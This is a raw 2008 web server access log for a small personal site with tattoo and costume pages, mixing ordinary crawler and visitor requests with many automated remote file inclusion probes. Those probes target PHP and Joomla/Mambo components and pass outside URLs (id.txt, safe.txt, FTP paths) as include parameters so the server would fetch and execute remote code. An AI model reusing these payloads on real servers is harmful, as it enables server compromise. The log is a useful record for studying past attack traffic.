219.93.96.46 - - [24/Jun/2008:21:59:18 -0500] "GET /logs/access_log.1207785600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1207785600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1207785600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3ESlurp;%20http:/help.yahoo.com/help/us/ysearch/slurp)%22%2074.6.7.151%20-%20-%20[09/Apr/2008:%20...%20wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http:%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1207785600%3C/span%3E%20-%20%3Cem%3E209k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r76%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0oGkj.eomFI.t4ArptXNyoA;_ylu=X3oDMTB0MjNvaXN0BHNlYwNzcgRwb3MDOTc2BGNvbG8Dc2sxBHZ0aWQD/SIG=11h3v9a2l/EXP=1214444574/**http%3a/hiperlink.com.pl///Neos_Chronos/header.php?base_folder=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 469 "-""libwww-perl/5.79"
200.35.33.82 - - [24/Jun/2008:22:01:33 -0500] "GET /logs//?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 200 88841 "-""libwww-perl/5.805"
200.35.33.82 - - [24/Jun/2008:22:01:42 -0500] "GET //?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
87.101.4.49 - - [24/Jun/2008:22:04:17 -0500] "GET /logs/access_log.1207785600//modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
87.101.4.49 - - [24/Jun/2008:22:04:17 -0500] "GET //modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
87.101.4.49 - - [24/Jun/2008:22:04:17 -0500] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
213.214.0.132 - - [24/Jun/2008:22:07:20 -0500] "GET /logs/book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:22:07:21 -0500] "GET /logs/book.php5?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:22:07:25 -0500] "GET /book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:22:07:25 -0500] "GET /book.php5?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
200.168.76.155 - - [24/Jun/2008:22:09:16 -0500] "GET /logs/access_log.1207785600/modules/My_eGallery/index.php?basepath=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.808"
200.168.76.155 - - [24/Jun/2008:22:09:16 -0500] "GET /modules/My_eGallery/index.php?basepath=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
200.168.76.155 - - [24/Jun/2008:22:09:17 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:22:09:29 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:22:09:30 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:22:09:34 -0500] "GET //skin/zero_vote/error.php?dir=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
193.194.84.215 - - [24/Jun/2008:22:09:35 -0500] "GET //skin/zero_vote/error.php?dir=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
59.120.32.19 - - [24/Jun/2008:22:15:12 -0500] "GET /logs/access_log.1207785600///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
59.120.32.19 - - [24/Jun/2008:22:15:13 -0500] "GET ///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
59.120.32.19 - - [24/Jun/2008:22:15:13 -0500] "GET /logs///Neos_Chronos/header.php?base_folder=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
88.208.231.141 - - [24/Jun/2008:22:18:52 -0500] "GET /logs/mcf.php?content=http://aphpdeveloper.co.uk/var/echo.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
88.208.231.141 - - [24/Jun/2008:22:18:52 -0500] "GET /mcf.php?content=http://aphpdeveloper.co.uk/var/echo.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
87.101.4.49 - - [24/Jun/2008:22:20:22 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
87.101.4.49 - - [24/Jun/2008:22:20:23 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
67.202.53.166 - - [24/Jun/2008:22:21:32 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:21:59 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:22:28 -0500] "GET /tattoo HTTP/1.0" 301 318 "-""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:22:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:23:02 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
201.17.3.26 - - [24/Jun/2008:22:23:21 -0500] "GET /logs/access_log.1207785600/index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
201.17.3.26 - - [24/Jun/2008:22:23:26 -0500] "GET /index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
201.17.3.26 - - [24/Jun/2008:22:23:31 -0500] "GET /logs/index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
67.202.53.166 - - [24/Jun/2008:22:23:49 -0500] "GET /tattoo/ HTTP/1.0" 200 466 "http://tomdolan.pconline.com/tattoo""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:24:01 -0500] "GET /tattoo/links.htm HTTP/1.0" 200 1325 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:24:18 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1762 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
74.53.178.146 - - [24/Jun/2008:22:24:27 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
74.53.178.146 - - [24/Jun/2008:22:24:27 -0500] "GET //skin/zero_vote/error.php?dir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
74.53.178.146 - - [24/Jun/2008:22:24:27 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
67.202.53.166 - - [24/Jun/2008:22:25:30 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
72.29.75.39 - - [24/Jun/2008:22:25:41 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:22:25:41 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:22:25:41 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:22:25:41 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
74.53.178.146 - - [24/Jun/2008:22:27:04 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
74.53.178.146 - - [24/Jun/2008:22:27:04 -0500] "GET //skin/zero_vote/error.php?dir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
74.53.178.146 - - [24/Jun/2008:22:27:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
67.202.53.166 - - [24/Jun/2008:22:27:11 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
85.234.133.173 - - [24/Jun/2008:22:27:23 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
85.234.133.173 - - [24/Jun/2008:22:27:23 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
67.202.53.166 - - [24/Jun/2008:22:28:31 -0500] "GET /tattoo/bonus.htm HTTP/1.0" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:28:54 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:29:44 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:29:59 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.0" 200 3254 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
67.202.53.166 - - [24/Jun/2008:22:30:18 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]"
87.101.4.49 - - [24/Jun/2008:22:30:41 -0500] "GET /logs/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
87.101.4.49 - - [24/Jun/2008:22:30:41 -0500] "GET /modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://189.20.64.27/cache/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
216.241.132.36 - - [24/Jun/2008:22:33:37 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://bjork.axspace.com/test.txt?? HTTP/1.1" 404 318 "-""Avant Browser (http://www.avantbrowser.com)"
216.241.132.36 - - [24/Jun/2008:22:33:38 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://bjork.axspace.com/test.txt?? HTTP/1.1" 404 313 "-""Avant Browser (http://www.avantbrowser.com)"
72.29.75.39 - - [24/Jun/2008:22:35:11 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:22:35:11 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
211.20.85.150 - - [24/Jun/2008:22:39:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
217.148.95.147 - - [24/Jun/2008:22:40:46 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:22:40:46 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.76"
87.118.118.156 - - [24/Jun/2008:22:42:02 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:22:42:02 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
195.161.113.132 - - [24/Jun/2008:22:45:40 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.808"
195.161.113.132 - - [24/Jun/2008:22:45:40 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/barudak/id3.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.808"
201.16.242.3 - - [24/Jun/2008:22:46:57 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
201.16.242.3 - - [24/Jun/2008:22:46:58 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
201.16.242.3 - - [24/Jun/2008:22:46:58 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://itmovement.com/taxy/templates_nogui/editor/_samples/id.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
85.234.133.173 - - [24/Jun/2008:22:52:12 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
85.234.133.173 - - [24/Jun/2008:22:52:12 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
201.17.3.26 - - [24/Jun/2008:22:57:06 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
201.17.3.26 - - [24/Jun/2008:22:57:08 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
203.57.68.22 - - [24/Jun/2008:22:58:25 -0500] "GET /logs/access_log.1207785600/bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
203.57.68.22 - - [24/Jun/2008:22:58:26 -0500] "GET /bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
203.57.68.22 - - [24/Jun/2008:22:58:26 -0500] "GET /logs/bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
70.87.110.114 - - [24/Jun/2008:22:59:53 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.812"
70.87.110.114 - - [24/Jun/2008:22:59:53 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.italy-villa-rental.info/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.812"
201.130.79.38 - - [24/Jun/2008:23:00:27 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
201.130.79.38 - - [24/Jun/2008:23:00:27 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.35.33.82 - - [24/Jun/2008:23:00:28 -0500] "GET /logs/access_log.1207785600/index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
200.35.33.82 - - [24/Jun/2008:23:00:30 -0500] "GET /index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.35.33.82 - - [24/Jun/2008:23:00:32 -0500] "GET /logs/index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
59.106.19.213 - - [24/Jun/2008:23:02:58 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
59.106.19.213 - - [24/Jun/2008:23:02:58 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
59.106.19.213 - - [24/Jun/2008:23:03:00 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
59.106.19.213 - - [24/Jun/2008:23:03:00 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
76.235.176.154 - - [24/Jun/2008:23:04:37 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGIH,GGIH:2007-02,GGIH:en&q=tattoo+flash+vintage""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:37 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:37 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:47 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:47 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:47 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:47 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:47 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:47 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:48 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:48 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:48 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:48 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
76.235.176.154 - - [24/Jun/2008:23:04:48 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; InfoPath.1)"
85.158.181.17 - - [24/Jun/2008:23:04:59 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 319 "-""Advanced Browser (http://www.avantbrowser.com)"
201.17.3.26 - - [24/Jun/2008:23:06:10 -0500] "GET /logs//com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
201.17.3.26 - - [24/Jun/2008:23:06:12 -0500] "GET //com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
213.218.141.5 - - [24/Jun/2008:23:06:29 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
213.218.141.5 - - [24/Jun/2008:23:06:29 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
201.17.3.26 - - [24/Jun/2008:23:06:30 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
201.17.3.26 - - [24/Jun/2008:23:06:33 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
213.218.141.5 - - [24/Jun/2008:23:07:41 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://cilux.coolpage.biz/safe.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
213.218.141.5 - - [24/Jun/2008:23:07:41 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://cilux.coolpage.biz/safe.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
59.106.19.213 - - [24/Jun/2008:23:10:38 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
59.106.19.213 - - [24/Jun/2008:23:10:38 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
74.6.8.113 - - [24/Jun/2008:23:11:03 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
59.106.19.213 - - [24/Jun/2008:23:12:05 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
59.106.19.213 - - [24/Jun/2008:23:12:05 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sv-hbc.nl/db/cgi/idscan3?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
203.57.68.22 - - [24/Jun/2008:23:13:39 -0500] "GET /logs/access_log.1207785600/bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
203.57.68.22 - - [24/Jun/2008:23:13:40 -0500] "GET /bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
203.57.68.22 - - [24/Jun/2008:23:13:41 -0500] "GET /logs/bughttp://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
74.6.8.113 - - [24/Jun/2008:23:14:29 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
